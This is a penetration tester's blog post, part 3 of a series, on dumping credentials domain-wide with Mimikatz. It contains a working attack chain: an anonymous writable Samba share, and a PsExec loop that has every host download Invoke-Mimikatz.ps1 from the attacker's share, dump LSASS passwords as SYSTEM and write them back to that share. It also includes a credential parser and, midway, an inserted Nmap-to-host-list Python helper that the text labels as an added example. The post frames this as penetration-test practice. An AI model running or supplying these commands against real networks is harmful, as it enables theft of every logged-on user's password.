Dumping a Domain’s Worth of Passwords with Mimikatz Part 3

By Russel Van Tuyl

Before you go any further into this post, please note that this entire attack depends on already having obtained a shared local admin or domain admin credential. If you only have a shared local admin password, this can land you domain admin credentials. In my case, I already had domain admin credentials, and this attack landed me forest admin creds.

This method rides on the coattails of the work done by @JosephBialek, @mubix, @harmj0y, and @gentilkiwi. I was having trouble getting Veil PowerTools' Invoke-MassMimikatz PowerShell script working, most likely due to keyboard actuator problems. I also didn't want to go changing my registry settings or install a new program to do a mass Mimikatz attack. This post details the path I chose for collecting creds from a network using Mimikatz.

This post will walk through how I used Sysinternals PsExec, PowerShell, Python, Invoke-Mimikatz.ps1, and an SMB share to gather plain-text passwords en masse across an organization. I wanted to do it in memory, to avoid uploading and executing binaries on the target hosts. Having previously obtained a valid domain admin account, I used PsExec to launch a PowerShell instance on each target. Once launched, PowerShell downloads the Invoke-Mimikatz.ps1 script from the share and executes it, all in memory. The output from Invoke-Mimikatz.ps1 is then redirected to the network file share for later retrieval. I then wrote a Python script that parses all the files in the directory and provides a nice unique list of usernames and passwords.

The Setup

First you'll need to set up a network share that anyone can write files to. You can do this in Windows or Linux. I used a Kali host to set up the SMB file share. To do so, create a folder on your Kali host that will be used to store Invoke-Mimikatz.ps1 and its output files. Don't forget to set the folder permissions as well: the guest account Samba maps anonymous users to (usually nobody) needs write and execute access on the folder and traverse (execute) access on every parent directory, so if /root is mode 700 on your build, either relax that or put the share somewhere like /srv/mimikatz instead. Bear in mind that this share will end up holding plain-text domain credentials, so keep it reachable only from the engagement network and remove it when you are done.

mkdir /root/mimikatz
chmod 703 /root/mimikatz

Open /etc/samba/smb.conf and place this text at the end of the file:

[data]
path = /root/mimikatz
browseable = no
writable = yes
guest ok = yes

The section header must be exactly [data], since that is the share name used in the UNC paths later on. On current Samba versions you will most likely also need map to guest = Bad User in the [global] section, otherwise the failed login from a target's machine account is rejected instead of being mapped to guest. Note as well that Windows 10 1709 and later refuse guest SMB sessions by default, so on those hosts you will need an authenticated share instead.

Start (or restart) the SMB file server. On newer Kali and Debian releases the service is named smbd, so use service smbd restart there:

service samba restart

Now that the SMB file share is set up, let's get a copy of the Invoke-Mimikatz.ps1 script and place it in our SMB file share. The Invoke-Mimikatz.ps1 PowerShell script can be found in both PowerSploit and Veil Framework's Veil-Pillage. If you already have either of those tools installed, copy Invoke-Mimikatz.ps1 to the SMB share at /root/mimikatz. If you don't have a copy of the Invoke-Mimikatz.ps1 script on your Kali host, download it with wget directly into your SMB file share:

wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 -P /root/mimikatz

Next up, we need to prepare our PsExec statement. First you'll need to generate a file containing a list of target hostnames or IPs that have TCP port 445 open. This can be accomplished by using Nmap to scan the network for port 445/tcp. My PsExec statement looked like this:

C:\PsExec.exe \\$h -d -e -u ACME\bob -p 'P@$$word1' -s cmd /c powershell -nop -command "& {IEX ((new-object net.webclient).downloadstring('\\172.16.1.205\data\Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}"
Let’s break this down:

\\$h is the target host in UNC form: $h is a PowerShell variable that we will define later in a ForEach loop, holding one hostname or IP from our target list.

The -d flag tells PsExec "Don't wait for process to terminate (non-interactive)". If this flag is absent, you will need to press Enter on your keyboard every time Invoke-Mimikatz.ps1 runs on a target in order to continue on to the next one.

The -e flag "Does not load the specified account's profile". We don't need to load the domain admin's profile on every box.

The -u and -p flags specify the username and password of the domain administrator account. The ACME\ portion is the domain associated with the user name; if a shared local administrator account is being used, omit it so that just bob follows -u. Because the statement is run from a PowerShell prompt, wrap the password in single quotes as shown: characters such as $ are otherwise expanded by PowerShell before PsExec ever sees them (P@$$word1 would have $$ interpolated). Keep in mind that the password is visible in the command line and command history on your own host, so use a dedicated account where you can.

The -s flag says to "Run the remote process in the System account". This matters because Mimikatz reads credentials out of LSASS memory, which requires SeDebugPrivilege (Invoke-Mimikatz -DumpCreds runs privilege::debug before sekurlsa::logonpasswords) or SYSTEM; running as SYSTEM sidesteps UAC and privilege issues entirely.

cmd /c powershell launches cmd.exe on the target host, which in turn launches powershell.exe. When PowerShell runs, it executes the code following the -command flag. Going through cmd.exe is what lets %COMPUTERNAME% be expanded on the target rather than on our machine.

IEX ((new-object net.webclient).downloadstring('\\172.16.1.205\data\Invoke-Mimikatz.ps1')) reads the Invoke-Mimikatz.ps1 file from our SMB file share (the one we stood up earlier) and IEX (Invoke-Expression) runs it in memory, so the script never touches the target's disk.

Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt} executes Invoke-Mimikatz with -DumpCreds (sekurlsa::logonpasswords) and redirects the output to our SMB share on the Kali box. Because that > is PowerShell's redirection operator, the file is written as UTF-16-LE with a byte-order mark, which is why the output needs an encoding conversion before ordinary tools can parse it (see the Profit section).

%COMPUTERNAME% is a Windows environment variable holding the target's hostname, so each run produces a file on the SMB share named like "BOB-LAPTOP.txt".

PsExec has a built-in iterator: the @file syntax runs the command against every host listed in a file. I was having trouble getting the @ iterator to work from a PowerShell terminal, so I opted to use a PowerShell ForEach loop. I could have used the @ iterator from a normal cmd.exe terminal, but there %COMPUTERNAME% was being expanded on my local machine.
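The hosts.txt the loop in the next section reads is the Nmap step from above. As an added example that is not part of the original post, here is a Python helper that turns Nmap greppable output (nmap -p445 --open -oG scan.gnmap 172.16.1.0/24; the range and file name are assumptions) into that list, keeping only hosts where 445/tcp is actually open rather than filtered or closed, and optionally emitting the resolved hostname instead of the IP. The scan lines embedded below are constructed to match Nmap's -oG format, not a real scan.

```python
import re
import sys

# Added example, not the original post's code: extract hosts with 445/tcp open
# from Nmap greppable output (nmap -p445 --open -oG scan.gnmap <range>).

# "Host:" field of a -oG line: the IP, then the reverse-DNS name (or nothing) in parentheses.
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def hosts_with_open_port(grepable_text, port=445, prefer_hostname=False):
    """Return the hosts whose `port`/tcp is reported open, de-duplicated and in
    scan order. Entries are IPs unless prefer_hostname is set and Nmap resolved
    a name (PsExec then reaches the box by hostname rather than by address)."""
    found, seen = [], set()
    for line in grepable_text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines, the "# Nmap done" trailer, anything else
        ip, name = m.group(1), m.group(2)
        # Tab-separated "Key: value" fields; only the Ports field matters here.
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        for entry in fields.get("Ports", "").split(", "):
            # Each entry is port/state/proto/owner/service/rpc/version/
            parts = entry.strip().split("/")
            if len(parts) >= 3 and parts[0] == str(port) and parts[1] == "open" and parts[2] == "tcp":
                target = name if (prefer_hostname and name) else ip
                if target not in seen:
                    seen.add(target)
                    found.append(target)
                break
    return found


# Constructed sample in -oG format (not a real scan).
SAMPLE_GNMAP = """\
# Nmap 6.47 scan initiated as: nmap -p139,445 -oG - 172.16.1.0/24
Host: 172.16.1.10 ()\tStatus: Up
Host: 172.16.1.10 (bob-laptop.acme.local)\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (0)
Host: 172.16.1.11 (fileserver.acme.local)\tPorts: 139/closed/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 172.16.1.12 ()\tPorts: 445/open/tcp//microsoft-ds///
Host: 172.16.1.13 (printer.acme.local)\tPorts: 139/open/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///
# Nmap done -- 256 IP addresses (4 hosts up) scanned
"""

if __name__ == "__main__":
    # Usage: python gnmap_to_hosts.py scan.gnmap > hosts.txt   (script name is an assumption)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    for host in hosts_with_open_port(text):
        print(host)
```

Filtered 445 is deliberately excluded: PsExec will just hang on those hosts, and with -d in play you will not notice until the loop is long past them.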

Execution

Open an elevated PowerShell prompt and enter the one-line command shown below, adjusting the file paths to match your locations. Alternatively, psexec.py from CoreLabs' Impacket could potentially be used to conduct this attack entirely from a Linux host.

ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p 'P@$$word1' -s cmd /c powershell -nop -command "& {IEX ((new-object net.webclient).downloadstring('\\172.16.1.205\data\Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}"}

After executing the prepared PsExec statement in PowerShell, just sit back and watch the text files rain into your SMB file share. The text files will look similar to this:

[Screenshot: PsExec]

Profit

It would be very time-consuming to read through each recovered text file and pick out the account name, domain, and plain-text password one by one. Therefore, I wrote a Python script that parses all the files in a given directory and prints the recovered credentials to the screen. The script can be retrieved from our Bitbucket repository at https://bitbucket.org/swordshieldsec/parsers/src. I couldn't quite nail down handling the UTF-16-LE encoding of the Invoke-Mimikatz output files in Python (PowerShell's > redirection writes them that way, with a byte-order mark). Because of that, I used unix2dos to convert the encoding to something I could work with; dos2unix/unix2dos 6.0 and later convert UTF-16 input to the locale's encoding by default. Run this command to convert them:

for i in /root/mimikatz/*.txt; do unix2dos "$i"; done

The glob hands unix2dos full paths, so the loop works from any directory and leaves Invoke-Mimikatz.ps1 alone.

Now we can use parse_Invoke-Mimikatz.py to parse all of the files, aggregate the accounts, and print them to the screen. Use the -F flag to specify a single file or the -D flag to specify a directory; python parse_Invoke-Mimikatz.py --help prints the usage statement. Now it's time to run the script, do your pwn dance, and party on the network with your newfound creds. Have fun at pwn town!

[Screenshot: pwntown]


Additional Resources:

http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/



Russel Van Tuyl is a security analyst for Sword & Shield Enterprise Security. His primary role is conducting network vulnerability assessments and penetration tests, but he also performs web application assessments, firewall configuration audits, wireless assessments, and social engineering.

He has more than 10 years of experience in the technical field in roles such as database design, field device support, help desk, IT asset management, programming, and information security.
